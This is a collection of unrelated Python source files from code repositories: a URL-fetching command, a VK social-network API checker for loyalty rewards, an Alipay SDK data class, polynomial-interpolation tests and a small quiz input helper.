# requests.exceptions.ConnectionError,
# requests.exceptions.TooManyRedirects etc.
# and flagging records as having errored out
print("Request Exceptions Error fetching %s: %s" % (url['expanded_url'].encode('utf-8'), e))
except (requests.packages.urllib3.exceptions.HTTPError) as e:
print("HTTPError fetching %s: %s" % (url['expanded_url'].encode('utf-8'), e))
except (socket_error) as e:
print("Socket error fetching %s: %s" % (url['expanded_url'].encode('utf-8'), e))
tuiu = TwitterUserItemUrl(
item=tui,
start_url=url['url'],
expanded_url=url['expanded_url'],
final_url=url['url'],
final_status=410)
tuiu.save()
if urls:
count += 1
if options['limit']:
if count >= options['limit']:
sys.exit()
def decode_headers(self, headers, encoding):
try:
header_codec = codecs.lookup(encoding
or 'utf-8')
except LookupError:
header_codec = codecs.lookup('utf-8')
final_headers = {}
for k, v in headers.items():
final_headers.update({
header_codec.decode(k),
header_codec.decode(v)})
return final_headers
| gwu-libraries/social-feed-manager | sfm/ui/management/commands/fetch_urls.py | fetch_urls.py | py | 6,563 | python | en | code | 87 | github-code | 13 |
72387988177 | import json
from helpers import request_helper
from web import cache
from libs.socnet.socnet_base import SocnetBase
from models.soc_token import SocToken
from models.payment_loyalty_sharing import PaymentLoyaltySharing
class VkApi(SocnetBase):
API_PATH = 'https://api.vk.com/method/'
MAX_LIKES_COUNT = 1000
def subscription_control(self, condition_id):
answer = False
condition = PaymentLoyaltySharing.query.get(condition_id)
if not condition:
return False
api_url = self.API_PATH \
+ 'groups.getById?group_id=' \
+ condition.data \
+ '&fields=members_count'
group = request_helper.make_request(api_url, True)
if 'response' in group and len(group['response']) > 0 \
and 'members_count' in group['response'][0]:
answer = group['response'][0]['members_count']
return answer
    def check_subscription(self, url, token_id, sharing_id):
        """Check whether the token's user is subscribed to the target VK group.

        (Original docstring translated from Russian: "subscription to the group".)

        :param url: unused here; kept for a uniform checker signature.
        :param token_id: SocToken primary key identifying the user.
        :param sharing_id: PaymentLoyaltySharing primary key; its ``data``
            field holds the target group id.
        :return: CONDITION_PASSED / CONDITION_FAILED / CONDITION_ERROR.
        """
        answer = self.CONDITION_ERROR
        condition = PaymentLoyaltySharing.query.get(sharing_id)
        if not condition:
            return self.CONDITION_ERROR
        soc_token = SocToken.query.get(token_id)
        if not soc_token:
            return self.CONDITION_FAILED
        api_url = self.API_PATH \
            + 'users.getSubscriptions?user_id=' \
            + soc_token.soc_id
        userSubs = request_helper.make_request(api_url, True)
        if not ('response' in userSubs and 'groups' in userSubs['response']):
            return self.CONDITION_ERROR
        answer = self.CONDITION_FAILED
        if not ('items' in userSubs['response']['groups']):
            return answer
        # Pass as soon as the target group id appears among subscriptions.
        for item in userSubs['response']['groups']['items']:
            if str(item) == str(condition.data):
                answer = self.CONDITION_PASSED
        return answer
def check_like(self, url, token_id, sharing_id):
"""лайк объекта"""
answer = self.CONDITION_ERROR
condition = PaymentLoyaltySharing.query.get(sharing_id)
if not condition:
return self.CONDITION_FAILED
data = json.loads(condition.data)
if not ('owner_id' in data and 'type' in data and 'item_id' in data):
return self.CONDITION_FAILED
soc_token = SocToken.query.get(token_id)
if not soc_token:
return self.CONDITION_FAILED
key = 'vk_likes_list_%s' % str(condition.id)
if cache.get(key):
likes_list = cache.get(key)
answer = self.CONDITION_FAILED
for user_id in likes_list:
if str(user_id) == str(soc_token.soc_id):
answer = self.CONDITION_PASSED
break
return answer
offset = 0
likes_count = self.MAX_LIKES_COUNT
likes_list = []
while not (offset > likes_count):
api_url = self.API_PATH \
+ 'likes.getList' \
+ '?type=' \
+ str(data['type']) \
+ '&owner_id=' \
+ str(data['owner_id']) \
+ '&item_id=' \
+ str(data['item_id']) \
+ '&count=' \
+ str(self.MAX_LIKES_COUNT) \
+ '&offset=' \
+ str(offset)
likes = request_helper.make_request(api_url, True)
if not('response' in likes and 'count' in likes['response'] and 'users' in likes['response']):
return self.CONDITION_ERROR
if answer == self.CONDITION_ERROR:
answer = self.CONDITION_FAILED
likes_count = int(likes['response']['count'])
for user_id in likes['response']['users']:
likes_list.append(user_id)
if str(user_id) == str(soc_token.soc_id):
answer = self.CONDITION_PASSED
offset += self.MAX_LIKES_COUNT
cache.set(key, likes_list, 50)
return answer
def likes_control_value(self, condition_id):
answer = False
condition = PaymentLoyaltySharing.query.get(condition_id)
if not condition:
return False
data = json.loads(condition.data)
if not ('owner_id' in data and 'type' in data and 'item_id' in data):
return False
api_url = self.API_PATH \
+ 'likes.getList' \
+ '?type=' \
+ str(data['type']) \
+ '&owner_id=' \
+ str(data['owner_id']) \
+ '&item_id=' \
+ str(data['item_id']) \
+ '&count=1'
likes = request_helper.make_request(api_url, True)
if not('response' in likes and 'count' in likes['response'] and 'users' in likes['response']):
return False
answer = int(likes['response']['count'])
return answer
| bigbag/archive_term-flask | libs/socnet/vk.py | vk.py | py | 4,962 | python | en | code | 0 | github-code | 13 |
17053793224 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ItemQueryInfo(object):
def __init__(self):
self._brand = None
self._buy_url = None
self._currency_type = None
self._goods_id = None
self._goods_name = None
self._lanch_time = None
self._monetary_unit = None
self._price = None
self._promo_pic_url_list = None
self._score = None
self._tags = None
@property
def brand(self):
return self._brand
@brand.setter
def brand(self, value):
self._brand = value
@property
def buy_url(self):
return self._buy_url
@buy_url.setter
def buy_url(self, value):
self._buy_url = value
@property
def currency_type(self):
return self._currency_type
@currency_type.setter
def currency_type(self, value):
self._currency_type = value
@property
def goods_id(self):
return self._goods_id
@goods_id.setter
def goods_id(self, value):
self._goods_id = value
@property
def goods_name(self):
return self._goods_name
@goods_name.setter
def goods_name(self, value):
self._goods_name = value
@property
def lanch_time(self):
return self._lanch_time
@lanch_time.setter
def lanch_time(self, value):
self._lanch_time = value
@property
def monetary_unit(self):
return self._monetary_unit
@monetary_unit.setter
def monetary_unit(self, value):
self._monetary_unit = value
@property
def price(self):
return self._price
@price.setter
def price(self, value):
self._price = value
@property
def promo_pic_url_list(self):
return self._promo_pic_url_list
@promo_pic_url_list.setter
def promo_pic_url_list(self, value):
if isinstance(value, list):
self._promo_pic_url_list = list()
for i in value:
self._promo_pic_url_list.append(i)
@property
def score(self):
return self._score
@score.setter
def score(self, value):
self._score = value
@property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags = value
def to_alipay_dict(self):
params = dict()
if self.brand:
if hasattr(self.brand, 'to_alipay_dict'):
params['brand'] = self.brand.to_alipay_dict()
else:
params['brand'] = self.brand
if self.buy_url:
if hasattr(self.buy_url, 'to_alipay_dict'):
params['buy_url'] = self.buy_url.to_alipay_dict()
else:
params['buy_url'] = self.buy_url
if self.currency_type:
if hasattr(self.currency_type, 'to_alipay_dict'):
params['currency_type'] = self.currency_type.to_alipay_dict()
else:
params['currency_type'] = self.currency_type
if self.goods_id:
if hasattr(self.goods_id, 'to_alipay_dict'):
params['goods_id'] = self.goods_id.to_alipay_dict()
else:
params['goods_id'] = self.goods_id
if self.goods_name:
if hasattr(self.goods_name, 'to_alipay_dict'):
params['goods_name'] = self.goods_name.to_alipay_dict()
else:
params['goods_name'] = self.goods_name
if self.lanch_time:
if hasattr(self.lanch_time, 'to_alipay_dict'):
params['lanch_time'] = self.lanch_time.to_alipay_dict()
else:
params['lanch_time'] = self.lanch_time
if self.monetary_unit:
if hasattr(self.monetary_unit, 'to_alipay_dict'):
params['monetary_unit'] = self.monetary_unit.to_alipay_dict()
else:
params['monetary_unit'] = self.monetary_unit
if self.price:
if hasattr(self.price, 'to_alipay_dict'):
params['price'] = self.price.to_alipay_dict()
else:
params['price'] = self.price
if self.promo_pic_url_list:
if isinstance(self.promo_pic_url_list, list):
for i in range(0, len(self.promo_pic_url_list)):
element = self.promo_pic_url_list[i]
if hasattr(element, 'to_alipay_dict'):
self.promo_pic_url_list[i] = element.to_alipay_dict()
if hasattr(self.promo_pic_url_list, 'to_alipay_dict'):
params['promo_pic_url_list'] = self.promo_pic_url_list.to_alipay_dict()
else:
params['promo_pic_url_list'] = self.promo_pic_url_list
if self.score:
if hasattr(self.score, 'to_alipay_dict'):
params['score'] = self.score.to_alipay_dict()
else:
params['score'] = self.score
if self.tags:
if hasattr(self.tags, 'to_alipay_dict'):
params['tags'] = self.tags.to_alipay_dict()
else:
params['tags'] = self.tags
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ItemQueryInfo()
if 'brand' in d:
o.brand = d['brand']
if 'buy_url' in d:
o.buy_url = d['buy_url']
if 'currency_type' in d:
o.currency_type = d['currency_type']
if 'goods_id' in d:
o.goods_id = d['goods_id']
if 'goods_name' in d:
o.goods_name = d['goods_name']
if 'lanch_time' in d:
o.lanch_time = d['lanch_time']
if 'monetary_unit' in d:
o.monetary_unit = d['monetary_unit']
if 'price' in d:
o.price = d['price']
if 'promo_pic_url_list' in d:
o.promo_pic_url_list = d['promo_pic_url_list']
if 'score' in d:
o.score = d['score']
if 'tags' in d:
o.tags = d['tags']
return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/ItemQueryInfo.py | ItemQueryInfo.py | py | 6,130 | python | en | code | 241 | github-code | 13 |
74901464016 | import pytest
from utilities import *
from polynomial_interpolation_tools import *
from numpy import random
import numpy as np
@pytest.mark.parametrize('m, n', [(10,11), (7,11), (5,10)])
def test_coefficients_solve(m, n):
    """
    Test to see if obtained coefficients match that of a true polynomial these points came from.
    :param m: An integer corresponding to degree of polynomial
    :param n: An integer corresponding to number of points taken from that polynomial
    :return bool: Pass or fail
    """
    # Finding n points f on a known polynomial of degree m, assuming n >= m
    x_test = np.random.rand(n)
    f_test = 0.0*x_test
    a_test = np.random.rand(m)
    for i in range(n):
        # BUGFIX: the inner loop previously reused the name 'n', clobbering
        # the point count so coefficients_solve was called with m-1 below.
        for k in range(m):
            f_test[i] = f_test[i] + a_test[k]*x_test[i]**k
    # Reverse engineering for coefficients from these points
    a = coefficients_solve(x_test, f_test, n)
    # Checking coefficients are the same
    assert(np.linalg.norm(a-a_test) < 1.0e-6)
@pytest.mark.parametrize('n', [1,2,3,4,5])
def test_alternate_perturbations(n):
"""
Test to see if all up/down combinations of perturbations achieved.
:param n: An integer for size of array to find combinations of
:return bool: Pass or fail
"""
# Creating random array of values and finding all possible alternations
epsilons = np.random.rand(n)
perturbations = alternate_perturbations(epsilons)
# Checking found all possible combinations
assert(len(perturbations) == 2**n)
@pytest.mark.parametrize('n', [2, 3, 11])
def test_perturb_points(n):
"""
Test to see if points f are perturbed correctly.
:param n: An integer to define number of points being perturbed
:return bool: Pass or fail
"""
# Creating random array of points and perturbations
f = np.random.rand(n)
epsilons = np.random.rand(n)
f_perturbed = perturb_points(f, epsilons)
# Checking to see if points in punctured ball of perturbations
assert(((f-f_perturbed) != np.zeros(n)).all())
assert((f-f_perturbed <= epsilons).all())
if __name__ == '__main__':
import sys
pytest.main(sys.argv)
| jameswawright/NLA | scripts/test_polynomial_interpolation.py | test_polynomial_interpolation.py | py | 2,172 | python | en | code | 1 | github-code | 13 |
3848523959 | import requests
from bs4 import BeautifulSoup
#
response = requests.get("https://news.ycombinator.com/news")
response.raise_for_status()
web_page = response.text
soup = BeautifulSoup(web_page, "html.parser")
titles = soup.find_all(name="a", class_="titlelink")
article_links = []
article_titles = []
for title in titles:
text = title.getText()
article_titles.append(text)
link = title.get("href")
article_links.append(link)
article_upvotes = [score.getText() for score in soup.find_all(name="span", class_="score")]
# print(article_titles)
# print(article_links)
# print(article_upvotes)
# Locate the top-scoring article (first occurrence wins ties, as before).
# NOTE(review): score spans are collected independently of titles/links, so
# listings without a score (jobs/ads) can shift this index off the matching
# title — verify alignment against the scraped page.
scores = [int(score.split()[0]) for score in article_upvotes]
score_index = max(range(len(scores)), key=scores.__getitem__)
highest_score = scores[score_index]
print(f"{highest_score} Index: {score_index}")
print(f"Title: {article_titles[score_index]}\nLink: {article_links[score_index]}")
# with open("website.html", encoding="utf8") as file:
# contents = file.read()
#
# #print(contents)
# soup = BeautifulSoup(contents, 'html.parser')
# #print(soup.title)
# #print(soup.title.name)
# #print(soup.prettify())
#
# #print(soup.p)
#
# all_anchor_tags = soup.findAll(name="a")
# #print(all_anchor_tags)
#
# # for tag in all_anchor_tags:
# #print(tag.getText())
# #print(tag.get("href"))
#
# # heading = soup.find("h1", id="name")
# # print(heading)
# #
#
#
# # class_is_heading = soup.find_all(class_="heading")
# # print(class_is_heading)
# #
# # h3_heading = soup.find_all("h3", class_="heading")
# # print(h3_heading)
#
# # company_url = soup.select_one(selector="p a")
# # print(company_url)
#
# # company_url = soup.select_one(selector="#name") # Select by ID
# # print(company_url)
#
# heading = soup.select(selector=".heading") # Select by Class
# print(heading)
| gteachey/100daysofcode_python | day045/bs4-start/main.py | main.py | py | 1,876 | python | en | code | 0 | github-code | 13 |
21681639441 | import typer
import pytest
import uvicorn
import subprocess
app = typer.Typer(
help="cli tool stuff thing",
context_settings={"help_option_names": ["-h", "--help"]},
no_args_is_help=True,
)
@app.command(help="Serve the main uvicorn application")
def runserver(prod: bool = typer.Option(
False, help="Use production server with workers")):
uvicorn.run("app.main:app", host='127.0.0.1', port=8000, reload=not prod)
@app.command()
def makemigrations(name: str):
print('Hello', name)
@app.command(help="Run unit tests on all models")
def test():
subprocess.call(['pytest', '--no-header', '--verbose'])
if __name__ == '__main__':
app()
| Braden-Preston/fastapi-htmx | manage.py | manage.py | py | 672 | python | en | code | 0 | github-code | 13 |
17042061944 | a = int(input("Введите результат спортсмена в первый день: "))
b = int(input("Введите предпочтительный результат спортсмена: "))
k = 1
print(f"{k}-й день: {a}")
while a <= b:
a = a + (a / 100 * 10)
k = k + 1
print(f"{k}-й день: {a:.2f}")
print(f"На {k}-й день спортсмен достиг результата - не менее {b} км")
| TerryNight/HomeworkPython | Homework6.py | Homework6.py | py | 451 | python | ru | code | 0 | github-code | 13 |
def cipher(text, shift, encrypt=True):
    """Apply a Caesar shift to *text* over 'a'-'z' followed by 'A'-'Z'.

    Characters outside the 52-letter alphabet pass through unchanged.
    Shifting wraps around the combined alphabet, so 'z' + 1 becomes 'A'.

    Parameters
    ----------
    text : str
        A string to encrypt or decrypt.
    shift : int
        How many positions to move along the alphabet.
    encrypt : bool, optional
        True shifts forward (encrypt); False shifts backward (decrypt).

    Returns
    -------
    str
        The transformed text.

    Examples
    --------
    >>> cipher('shauna', 1, encrypt=True)
    'tibvob'
    >>> cipher('tibvob', 1, encrypt=False)
    'shauna'
    """
    # BUGFIX (docs): the old docstring examples claimed 'Tibvob'/'Shauna';
    # the code has always produced 'tibvob'/'shauna' for these inputs.
    alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    delta = shift if encrypt else -shift
    pieces = []
    for symbol in text:
        position = alphabet.find(symbol)
        if position == -1:
            pieces.append(symbol)
        else:
            pieces.append(alphabet[(position + delta) % len(alphabet)])
    return ''.join(pieces)
| QMSS-G5072-2022/Cipher_Han_Shauna | src/cipher_shh2145_2/cipher_shh2145_2.py | cipher_shh2145_2.py | py | 1,071 | python | en | code | 0 | github-code | 13 |
27749964817 | # -*- coding: utf-8 -*-
# @Time : 2021/5/15 9:49
# @Author : WANGWEILI
# @FileName: 3.py
# @Software: PyCharm
"""
输入一个字符串s,只能包括英文括号( 和 ),且左右括号匹配。回车符结束输入。
字符串s长度:2<=s.length()<=50
"""
SYMBOLS = {'}': '{', ']': '[', ')': '(', '>': '<'}
SYMBOLS_L, SYMBOLS_R = SYMBOLS.values(), SYMBOLS.keys()


def check(s):
    """Count matched bracket pairs in *s*.

    Returns the number of matched pairs, or False as soon as a closing
    symbol fails to match the most recent unmatched opening symbol.
    Characters outside SYMBOLS are ignored; unmatched leftover opening
    symbols do not affect the count.
    """
    stack = []
    matched = 0
    for ch in s:
        if ch in SYMBOLS_L:
            # Opening symbol: remember it.
            stack.append(ch)
        elif ch in SYMBOLS_R:
            # Closing symbol: must pair with the top of the stack.
            if not (stack and stack[-1] == SYMBOLS[ch]):
                return False
            stack.pop()
            matched += 1
    return matched
stopword = ''
str = ''
for line in iter(input, stopword):
str += line
print(check(str))
| Echowwlwz123/learn7 | 浦发机试题/3.py | 3.py | py | 861 | python | en | code | 0 | github-code | 13 |
26412155082 | '''
0123456789
0 2199943210
1 3987894921
2 9856789892
3 8767896789
4 9899965678
'''
import Inputs
# ADYACENT POSITIONS AS VALUES
def val_up(val_map, row, col):
    """Return the height of the cell directly above (row-1, col).

    At the top boundary there is no neighbour, so 10 is returned as a
    sentinel that compares higher than any height digit (0-9).
    """
    # Fix: the old local variable shadowed the function's own name.
    if row == 0:
        return 10
    return int(val_map[row - 1][col])
def val_right(val_map, row, col): # check right
if len(val_map[row]) != col+1:
val_right = int(val_map[row][col+1])
else:
val_right = 10
return val_right
def val_down(val_map, row, col): # check down
if len(val_map) != row + 1:
val_down = int(val_map[row+1][col])
else:
val_down = 10
return val_down
def val_left(val_map, row, col): # check left
if col != 0:
val_left = int(val_map[row][col-1])
else:
val_left = 10
return val_left
# ADYACENT POSITIONS AS OBJECTS
def pos_up(val_map, row, col): # check up
if row != 0:
return Position(row-1, col, val_map)
else:
return None # If it's a corner/boundary situation, return None
def pos_right(val_map, row, col): # check right
if len(val_map[row]) != col+1:
return Position(row, col+1, val_map)
else:
return None
def pos_down(val_map, row, col): # check down
if len(val_map) != row + 1:
val_down = Position(row+1, col, val_map)
else:
val_down = None
return val_down
def pos_left(val_map, row, col): # check left
if col != 0:
val_left = Position(row, col-1, val_map)
else:
val_left = None
return val_left
class Position:
def __init__(self, row, col, vals_map):
self.row = row
self.col = col
self.value = int(vals_map[row][col])
self.id = (row, col)
self.up_val = val_up(vals_map, row, col)
self.right_val = val_right(vals_map, row, col)
self.down_val = val_down(vals_map, row, col)
self.left_val = val_left(vals_map, row, col)
self.ady_values = [self.up_val, self.right_val, self.down_val, self.left_val]
def ady_positions(self, vals_map):
return [pos_up(vals_map, self.row, self.col),
pos_right(vals_map, self.row, self.col),
pos_down(vals_map, self.row, self.col),
pos_left(vals_map, self.row, self.col)]
def is_low_point(self):
'''Returns true if it's adyacent values are higher
than the checked value.'''
if all([ady > int(self.value) for ady in self.ady_values]):
return True
else:
return False
def is_basin_limit(self):
'''Returns true if it's value is equal to 9'''
if self.value == 9:
return True
else:
return False
sample = [
"2199943210",
"3987894921",
"9856789892",
"8767896789",
"9899965678",
]
puz_input = Inputs.Day09()
# puz_input = sample
low_points = []
basin_lst = []
# Convert list of strings to list of list of chars
for row_idx, row in enumerate(puz_input):
lst = []
word = puz_input[row_idx]
lst.extend(puz_input[row_idx])
puz_input[row_idx] = lst
# Make a list with the low points in the map
for row_idx, row in enumerate(puz_input):
for col_idx, col in enumerate(row):
pos = Position(row_idx, col_idx, puz_input)
if pos.is_low_point():
low_points.append(pos)
# Start crawling from the low points in the map
for low_pt in low_points:
basin = [low_pt.id]
old_basin_count = 0
n=0
# clean list
while len(basin) != old_basin_count:
n += 1
old_basin_count = len(basin)
for pt_id in basin.copy():
pt = Position(pt_id[0], pt_id[1], puz_input)
ady_vals = pt.ady_positions(puz_input)
for ady_val in ady_vals:
if ady_val is not None:
if ady_val.value != 9 and ady_val.id not in basin:
basin.append(ady_val.id)
basin_lst.append(basin)
sorted_lst = sorted(basin_lst, key = len)
answer = len(sorted_lst[-1])*len(sorted_lst[-2])*len(sorted_lst[-3])
print(len(sorted_lst[-1]), len(sorted_lst[-2]), len(sorted_lst[-3]))
print(f"Answer is {answer}")
'''
119 99 97
1142757
''' | GastonBC/AdventOfCode | 2021/python/Day09_2.py | Day09_2.py | py | 4,426 | python | en | code | 0 | github-code | 13 |
24621126374 | #!/usr/bin/env python
''' Reservation and CompoundReservation classes for scheduling.
Author: Sotiria Lampoudi (slampoud@gmail.com)
December 2012
Reservation does not associate a single resource with each reservation.
Instead, the possible_windows field has become possible_windows_dict, a
dictionary mapping :
resource -> possible windows on that resource
Additionally, it is allowed to explicitly specify the resID, so as to
keep a uniform ID space between this and other parts of the scheduler.
'''
import copy
class Reservation(object):
resID = 0
def __init__(self, priority, duration, possible_windows_dict, previous_solution_reservation=None, request=None, request_group_id=None):
self.priority = priority
self.duration = int(duration)
self.previous_solution_reservation = previous_solution_reservation
self.request = request
self.request_group_id = request_group_id
self.possible_windows_dict = possible_windows_dict
# free_windows keeps track of which of the possible_windows
# are free.
self.free_windows_dict = copy.deepcopy(self.possible_windows_dict)
# clean up free windows by removing ones that are too small:
for resource in self.free_windows_dict.keys():
self.clean_up_free_windows(resource)
# set a unique resID.
Reservation.resID += 1
self.resID = Reservation.resID
# these fields are defined when the reservation is ultimately scheduled
self.scheduled_start = None
self.scheduled_quantum = None
self.scheduled_resource = None
self.scheduled = False
self.scheduled_timepoints = None
self.scheduled_by = None
# order is the parameter used for grouping & ordering in scheduling
self.order = 1
self.compound_reservation_parent = None
def schedule_anywhere(self):
# find the first available spot & stick it there
for resource in self.free_windows_dict.keys():
start = self.free_windows_dict[resource].find_interval_of_length(self.duration)
if start >= 0:
self.schedule(start, self.duration, resource,
'reservation_v3.schedule_anywhere()')
return True
return False
def schedule(self, start, quantum, resource, scheduler_description=None):
self.scheduled = True
self.scheduled_start = start
self.scheduled_quantum = quantum
self.scheduled_resource = resource
self.scheduled_timepoints = [{'time': start, 'type': 'start'}, {'time': start + self.duration, 'type': 'end'}]
self.scheduled_by = scheduler_description
if self.compound_reservation_parent:
self.compound_reservation_parent.schedule()
def unschedule(self):
self.scheduled_start = None
self.scheduled_quantum = None
self.scheduled_resource = None
self.scheduled = False
self.scheduled_timepoints = None
self.scheduled_by = None
if self.compound_reservation_parent:
self.compound_reservation_parent.unschedule()
def __str__(self):
msg = "Reservation ID: {0} \
\n\tpriority: {1} \
\n\tduration: {2} \
\n\tpossible windows dict: {3}\
\n\tis scheduled: {4}\n".format(self.resID, self.priority,
self.duration,
self.possible_windows_dict,
self.scheduled)
if self.scheduled:
msg += "\t\tscheduled start: {0}\n\t\tscheduled quantum: {1}\n\t\tscheduled resource: {2}\n\t\tscheduled by: {3}\n".format(
self.scheduled_start, self.scheduled_quantum, self.scheduled_resource, self.scheduled_by)
return msg
def __repr__(self):
return str(self.serialise())
def serialise(self):
serialised_windows = dict([(k, v.serialise()) for k, v in self.possible_windows_dict.items()])
return dict(
# resID = self.resID,
priority=self.priority,
duration=self.duration,
possible_windows_dict=serialised_windows,
scheduled=self.scheduled
)
    def __lt__(self, other):
        ''' Higher priority number is higher priority.
            If priority numbers are equal, then reservation belonging to
            c.r.s are ranked as and < single < oneof '''
        # Reverse ordering: a *higher* priority number sorts first.
        if self.priority == other.priority:
            if (self.compound_reservation_parent) and (other.compound_reservation_parent):
                selftype = self.compound_reservation_parent.type
                othertype = other.compound_reservation_parent.type
                if selftype == othertype:
                    # NOTE(review): priorities are already known equal here,
                    # so this comparison is always False ("not less than") —
                    # confirm this tie-breaking is intended.
                    return self.priority > other.priority
                elif selftype == 'and':
                    return True
                elif othertype == 'and':
                    return False
                elif selftype == 'oneof':
                    return False
                elif othertype == 'oneof':
                    return True
            else:
                # Equal priority, but at least one side lacks a parent.
                return self.priority > other.priority
        else:
            return self.priority > other.priority
def get_ID(self):
return self.resID
def remove_from_free_windows(self, interval, resource):
self.free_windows_dict[resource] = self.free_windows_dict[resource].subtract(interval)
self.clean_up_free_windows(resource)
def clean_up_free_windows(self, resource):
self.free_windows_dict[resource].remove_intervals_smaller_than(self.duration)
class CompoundReservation(object):
    """A group of Reservations scheduled together under a combining policy.

    The policy (``type``) controls when the compound is considered scheduled:
    'single' — exactly one block; 'oneof' — any one of the blocks;
    'and' — all of the blocks; 'many' — blocks are scheduled individually.
    """

    # Supported policies, mapped to human-readable descriptions.
    valid_types = {
        'single': 'A single one of the provided blocks is to be scheduled',
        'oneof': 'One of the provided blocks are to be scheduled',
        'and': 'All of the provided blocks are to be scheduled',
        'many': 'Any of the provided blocks are to be scheduled individually'
    }

    def __init__(self, reservation_list, cr_type='single'):
        """Link the reservations to this compound and validate its size.

        Parameters
        ----------
        reservation_list : list
            Reservations combined under this compound; each gets its
            ``compound_reservation_parent`` set to this instance.
        cr_type : str
            One of the keys of ``valid_types`` (default 'single').
        """
        self.reservation_list = reservation_list
        for r in self.reservation_list:
            r.compound_reservation_parent = self
        self.type = cr_type
        self.size = len(reservation_list)
        if cr_type == 'single' and self.size > 1:
            msg = ("Initializing a CompoundReservation as 'single' but with %d "
                   "individual reservations. Ignoring all but the first."
                   % self.size)
            print(msg)
            self.size = 1
            # BUGFIX: previously `[reservation_list.pop(0)]`, which mutated
            # the caller's list; slicing leaves the argument untouched.
            self.reservation_list = self.reservation_list[:1]
        if cr_type == 'and' and self.size == 1:
            msg = ("Initializing a CompoundReservation as 'and' but with %d "
                   "individual reservation."
                   % self.size)
            print(msg)
        if cr_type == 'oneof' and self.size == 1:
            msg = ("Initializing a CompoundReservation as 'oneof' but with %d "
                   "individual reservation."
                   % self.size)
            print(msg)
        self.scheduled = False

    def schedule(self):
        """Update the scheduled flag according to this compound's policy."""
        if self.type == 'single':
            self.scheduled = True
        elif self.type == 'oneof':
            self.scheduled = True
        elif self.type == 'and':
            # 'and' is only scheduled once every member reservation is.
            if all(r.scheduled for r in self.reservation_list):
                self.scheduled = True

    def unschedule(self):
        """Recompute the scheduled flag after a member is unscheduled."""
        if self.type == 'single':
            self.scheduled = False
        elif self.type == 'oneof':
            # 'oneof' stays scheduled while any member remains scheduled.
            self.scheduled = any(r.scheduled for r in self.reservation_list)
        elif self.type == 'and':
            self.scheduled = False

    def issingle(self):
        """Return True if this compound uses the 'single' policy."""
        return self.type == "single"

    def isoneof(self):
        """Return True if this compound uses the 'oneof' policy."""
        return self.type == "oneof"

    def isand(self):
        """Return True if this compound uses the 'and' policy."""
        return self.type == "and"

    def __repr__(self):
        return str(self.serialise())

    def serialise(self):
        """Return a plain-dict snapshot, serialising each member reservation."""
        reservation_list_repr = [r.serialise() for r in self.reservation_list]
        return dict(
            type=str(self.type),
            size=int(self.size),
            scheduled=bool(self.scheduled),
            reservation_list=reservation_list_repr
        )
| observatorycontrolsystem/adaptive_scheduler | adaptive_scheduler/kernel/reservation.py | reservation.py | py | 8,702 | python | en | code | 4 | github-code | 13 |
34785899118 | from rct229.utils.assertions import assert_, getattr_
from rct229.utils.jsonpath_utils import find_all, find_exactly_one_with_field_value
LEAP_YEAR_HRS = 8784
NON_LEAP_YEAR_HRS = 8760
def get_min_oa_cfm_sch_zone(rmi, zone_id, is_leap_year: bool = False):
    """Each zone can have multiple terminal units serving it in the proposed RMR and each of these units could supply OA CFM. In order to obtain a zone level OA CFM schedule the OA CFM provided by each terminal unit needs to be aggregated for each hour of the year. This function receives an RMR (B, U, or P) and a zone ID and loops through each terminal unit associated with the zone to create an aggregated 8760 for OA CFM for the zone.

    Parameters
    ----------
    rmi: json
        The RMR in which the OA CFM schedule will be determined for the specific Zone ID.
    zone_id:
        The Zone ID in which the aggregated (across the terminal units serving the zone) hourly OA CFM schedule will be determined.
    is_leap_year: bool, default: False
        Whether the year is a leap year or not.

    Returns
    -------
    list: An aggregated OA CFM hourly schedule for the zone (for each hour of the year, for each terminal unit, Terminal.minimum_outdoor_airflow is multiplied by Terminal.minimum_outdoor_airflow_multiplier_schedule, this product is summed across the terminal units for each hour of the year).
        An all-zero schedule if the zone has no terminals or no terminal in the zone uses minimum_outdoor_airflow_multiplier_schedule.
    """
    # Use the module-level hour counts directly; a previous revision
    # re-declared identical local constants, shadowing them.
    year_hrs = LEAP_YEAR_HRS if is_leap_year else NON_LEAP_YEAR_HRS
    min_OA_CFM_schedule_for_zone = [0] * year_hrs

    for terminal in find_all(
        f'$.buildings[*].building_segments[*].zones[*][?(@.id = "{zone_id}")].terminals[*]',
        rmi,
    ):
        minimum_outdoor_airflow = getattr_(
            terminal, "terminal", "minimum_outdoor_airflow"
        )
        minimum_outdoor_airflow_multiplier_schedule_id = terminal.get(
            "minimum_outdoor_airflow_multiplier_schedule"
        )
        # Terminals without a multiplier schedule contribute nothing.
        if minimum_outdoor_airflow_multiplier_schedule_id:
            minimum_outdoor_airflow_multiplier_schedule = getattr_(
                find_exactly_one_with_field_value(
                    "$.schedules[*]",
                    "id",
                    minimum_outdoor_airflow_multiplier_schedule_id,
                    rmi,
                ),
                "Schedule",
                "hourly_values",
            )
            assert_(
                len(min_OA_CFM_schedule_for_zone)
                == len(minimum_outdoor_airflow_multiplier_schedule),
                f"The length of schedule has to be either 8760 or 8784, but is {len(minimum_outdoor_airflow_multiplier_schedule)}.",
            )
            # Accumulate this terminal's hourly OA contribution into the
            # zone-level schedule (elementwise: total + multiplier * min OA).
            min_OA_CFM_schedule_for_zone = [
                total + multiplier * minimum_outdoor_airflow
                for total, multiplier in zip(
                    min_OA_CFM_schedule_for_zone,
                    minimum_outdoor_airflow_multiplier_schedule,
                )
            ]
    return min_OA_CFM_schedule_for_zone
| pnnl/ruleset-checking-tool | rct229/rulesets/ashrae9012019/ruleset_functions/get_min_oa_cfm_sch_zone.py | get_min_oa_cfm_sch_zone.py | py | 3,133 | python | en | code | 6 | github-code | 13 |
15418291967 |
def yn_checker(question):
    """Prompt with *question* until a yes/no answer is given.

    Accepts "yes"/"y" or "no"/"n" (any case) and returns the normalised
    string "Yes" or "No"; re-prompts with an error message otherwise.
    """
    error = "Please choose yes or no (y / n) "
    # Loop until a valid answer returns; the old `valid` flag was never set
    # and only obscured that the sole exit is the return statements.
    while True:
        response = input(question).lower()
        print()
        if response in ("yes", "y"):
            return "Yes"
        if response in ("no", "n"):
            return "No"
        print(error)
        print()
print()
# Seed the score board with demo values and display them.
losses = 10
wins = 10
print(losses)
print(wins)
# Pretend two quizzes were already played, then record another one.
quizzes_played = 2
quizzes_played += 1
# After the first quiz, offer to reset the board.
